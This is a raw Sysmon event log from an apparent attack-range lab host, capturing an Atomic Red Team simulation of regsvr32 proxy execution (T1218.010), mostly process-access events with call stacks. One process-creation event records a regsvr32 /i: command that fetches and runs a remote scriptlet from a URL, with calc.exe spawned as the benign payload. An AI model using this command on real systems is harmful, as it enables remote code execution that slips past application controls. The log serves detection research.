22:12:47.546{8e433fbf-2a44-6013-1100-000000001100}111610484C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360090Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360089Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360088Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000360087Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360086Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360085Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360084Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360083Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360082Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000360081Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.541{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 13241300x8000000000000000360080Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 11241100x8000000000000000360079Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:12:47.186 11241100x8000000000000000360078Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.530{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:12:47.186 10341000x8000000000000000360077Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.499{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360076Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.499{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 13241300x8000000000000000360075Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.483{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 13241300x8000000000000000360074Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.483{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data 10341000x8000000000000000360073Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360072Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360071Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360070Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360069Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360068Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.468{8e433fbf-36df-6013-9c03-000000001100}100767164C:\Windows\system32\regsvr32.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\System32\windows.storage.dll+14c4a6|C:\Windows\System32\windows.storage.dll+14ccc3|C:\Windows\System32\windows.storage.dll+14c2e8|C:\Windows\System32\windows.storage.dll+14c113|C:\Windows\System32\windows.storage.dll+14be0d|C:\Windows\System32\windows.storage.dll+13d1d8|C:\Windows\System32\windows.storage.dll+14d6dd|C:\Windows\System32\windows.storage.dll+15bf79|C:\Windows\System32\SHELL32.dll+3ec1e|C:\Windows\System32\SHELL32.dll+41755|C:\Windows\System32\SHELL32.dll+c014e|C:\Windows\System32\shcore.dll+2dce5|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000360067Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.476{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=F88CC05134C555D4E1CD1DEF78162A9A,SHA256=A103A57D50B32469C5811E2808F021ADF9D9220093B540B8A9C83B5C821D370E,IMPHASH=8EEAA9499666119D13B3F44ECD77A729{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\System32\regsvr32.exeC:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll 10341000x8000000000000000360066Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.358{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360065Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.358{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360064Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.358{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+2e3b5|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360063Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.312{8e433fbf-2a44-6013-1100-000000001100}111610484C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360062Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.312{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360061Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.233{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360060Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.233{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360059Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 